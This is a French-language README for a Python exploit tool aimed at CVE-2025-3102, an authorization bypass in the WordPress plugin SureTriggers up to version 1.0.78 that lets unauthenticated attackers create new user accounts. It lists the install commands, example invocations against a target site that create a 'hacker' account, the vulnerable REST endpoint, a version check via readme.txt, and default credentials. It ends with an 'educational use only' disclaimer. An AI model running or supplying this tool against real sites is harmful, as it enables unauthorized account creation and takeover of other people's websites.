
SureTriggers <= 1.0.78 - Exploit de contournement d'autorisation
Cet outil exploite une vulnérabilité de contournement d'autorisation dans le plugin WordPress SureTriggers (versions <= 1.0.78), permettant à des attaquants non authentifiés de créer de nouveaux comptes utilisateur WordPress.
🔥 Développé par 0xgh057r3c0n
requests, coloramaInstaller les dépendances :
pip3 install -r requirements.txt
Ou manuellement :
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.Cet outil est fourni à des fins éducatives et de tests de pénétration autorisés uniquement. L'accès non autorisé aux systèmes est illégal et punissable par la loi. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés.
| Argument | Description | Défaut |
|---|
-u, --url | URL de base du site WordPress | Requis |
--newmail | Adresse email du nouvel utilisateur | [email protected] |
--newuser | Nom d'utilisateur à créer | 0xgh057r3c0n |
--newpassword | Mot de passe du nouvel utilisateur | Wiz007@8876@ |